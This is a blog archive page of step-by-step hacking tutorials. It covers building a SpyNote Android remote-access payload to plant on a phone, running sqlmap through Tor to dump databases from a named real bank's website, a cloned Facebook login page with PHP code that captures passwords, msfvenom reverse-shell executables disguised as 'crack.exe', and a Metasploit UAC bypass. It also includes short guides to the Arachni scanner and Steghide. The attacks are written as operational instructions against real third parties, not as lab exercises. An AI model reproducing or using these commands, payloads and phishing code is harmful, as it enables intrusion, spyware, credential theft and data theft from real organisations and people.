Skip to main content

Posts

Showing posts from May, 2020

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device Windows 10 SpyNote Java  STEP 1: Download and Execute SpyNote (spynote.us is taken down by Department of Homeland Security) DOWNLOAD STEP 2: Provide the Port number and Java path if asked or leave everything as default.   STEP 3: Navigate to Tools menu and select Payload. Fill in the reverse IP and other app details. Here in this step you can configure the properties of the Payload If you plan to merge this payload with any legit application then browse that application here. STEP 4: Now click on build, it will trigger apktool and the apk will be created  . STEP 5:  Now copy the apk file to the android device using any medium like file sharing websites (mega.nz) STEP 6: Install the apk in the android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your co...

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=...

SQL injection (SQLMAP)

SQL Injection Using SQLMAP Requirements: SQLMAP Script ( Download ) Python Compiler STEP 1: Identifying the target : Use Google dork to find the target, search for the following- inurl:.php?id= site:.pk STEP 2: Checking for the vulnerability in the URL by passing ' (single quote) If it returns ERROR then its hack-able. STEP 3: Open up the power shell and navigate to the folder where sqlmap is kept. Type: python .\sqlmap.py -h to see the help. STEP 4: Finding out the name of the databases available. Type the following command in Power Shell: python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 5:  Finding out the Tables in it. Type the following command: python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" -D fcibankc_fci_urdu --tables Retrieved Table names STEP 6: Dumping the DATA inside Table...

Facebook Phishing

Capturing username and password using phishing page Legal disclaimer: Usage of phishing for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program STEP 1: Install Xampp and start the Apache Service. STEP 2: Open facebook.com and copy the source (ctrl + U) into a notepad file. Search for "action=" in the code and replace the URL following it with "capture.php" (only first 2 occurances needs to be changed) Save it as index.html STEP 3: Create a new text file and write the following code in it: <?php // Redirect header("Location:https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110"); // Get IP address $ip = isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : isset($_SERVER['HTTP_X_F...

Scan Websites for Vulnerabilities with Arachni

ARACHNI Arachni is a tool that allows you to assess the security of web applications. In less simple terms, Arachni is a high-performance, modular, Open Source Web Application Security Scanner Framework. It is a system which started out as an educational exercise and as a way to perform specific security tests against a web application in order to identify, classify and log issues of security interest. It has now evolved into an infrastructure which can reliably perform any sort of WebApp related security audit and general data scraping. Requirement: Windows 10 and Power Shell STEP 1: Download Download link :  https://www.arachni-scanner.com/download/ STEP 2: Extract Extract and navigate to the bin folder inside Arachni folder STEP 3: Fire-up the web interface by executing the following command .\arachni_web.bat It will start the local server, copy the link and open it in any browser: http://localhost:9292/ STEP 3: Start a scan Set the target url and start the scan STEP 4: Reportin...

Windows 10 UAC Bypass

Advanced Windows Exploitation In the previous post we saw how to get a meterpreter session, now we will use the same session to exploit further and gain SYSTEM level privileges. Taking into consideration that we have meterpreter session we will move on to next step. STEP 1: We will background the session that we had. To do this type the following command: background (to get out of meterpreter) Then type: back (to get out of currently used exploit) Then type: search UAC (to get all the UAC bypass exploits) STEP 2: Select the most appropriate exploit that is running in the latest windows 10 update too. Here we will select Windows Escalate UAC Protection Bypass (via SilentCleanup). To use this type the following command: use exploit/windows/local/bypassuac_silentcleanup set lhost <your IP> set lport 8080 set session <session ID> *To see stored session IDs type sessions -l set payload windows/x64/meterpreter/reverse_tcp run STEP 3: We have successfully bypassed the UAC and have...

Steganography using STEGHIDE

Guide to Steghide Tool In this article, we’ll learn about Steghide. There are various steganography tools available but the part that differentiates it is that it uses a variety of algorithms to encrypt the data. Moreover, Steghide supports to hide data behind any image(jpg/jpeg/png/gif/bmp), audio (mp3/wav), excel, etc. Introduction to Steganography In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program or convention. Sender can begin with a harmless picture and make few alterations to it in order to hide data, so that, this alteration goes unnoticed for someone who is not particularly seeking out for it. Features Compression of embedded data BMP, GIF and JPG supported Encryption of embedded data Decryption via password Uses various algorithms for encryption STEP 1: O pen your terminal and type the following command to download Steghide  apt - get install steghide For hel...

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    ...